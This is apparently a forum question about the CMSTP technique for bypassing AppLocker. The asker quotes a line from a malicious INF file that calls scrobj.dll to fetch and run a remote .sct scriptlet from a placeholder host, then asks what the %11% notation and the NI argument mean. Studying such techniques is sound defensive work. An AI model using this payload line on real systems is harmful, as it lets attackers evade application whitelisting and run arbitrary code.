A lot of literature suggests that CMSTP can be used for AppLocker bypass by making use of a malicious INF file which can fetch and run a malicious sct file which can in turn run arbitrary code. (https://twitter.com/NickTyrer/status/958450014111633408).
I didnt understand one line in the malicious INF file under [UnRegisterOCXSection]:
%11%\scrobj.dll,NI,https://<myip>/malicious.sct
Can someone please explain what is %11% notation and what is NI argument to scrobj.dll?
